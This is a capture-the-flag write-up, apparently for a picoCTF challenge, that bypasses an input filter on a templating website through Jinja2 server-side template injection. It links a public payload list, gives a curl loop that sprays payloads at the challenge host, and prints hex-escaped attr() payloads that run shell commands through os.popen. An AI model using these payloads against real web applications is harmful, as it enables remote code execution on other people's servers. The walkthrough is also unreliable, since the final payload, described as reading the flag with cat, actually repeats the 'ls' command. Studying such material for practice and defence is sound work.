Challenge Overview
I made a cool website where you can announce whatever you want! I read about input sanitization, so now I remove any kind of characters that could be a problem :)
I heard templating is a cool and modular way to build web apps! Check out my website here!
Solution
https://github.com/payloadbox/ssti-payloads
This is somewhat similar to the last challenge however when running this, {{ cycler.__init__.__globals__.os.popen('cat flag').read() }}, or anything similar you will get this message: Stop trying to break me >:(
So when looking for easy workarounds you can just google SSTI paylods and come across this website: https://github.com/payloadbox/ssti-payloads
If you put the payload into a file you can just attempt each one:
cat payload.txt | while read -r line; do curl -L -X POST -d "content=$line" http://shape-facility.picoctf.net:51355/; done
However it times out at some point so by just looking through the payloads and testing out some you can come across this one:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('id')|attr('read')()}}
From there you can see that it gave code execution and now you can slightly modify it to list out current directory.
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()}}
That command shows this output: __pycache__ app.py flag requirements.txt. So since you know that the flag is called flag and in the current directory you can just use the cat command to get the flag:
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\x5f')('os')|attr('popen')('ls')|attr('read')()}}
Flag: picoCTF{sst1_f1lt3r_byp4ss_8b53...}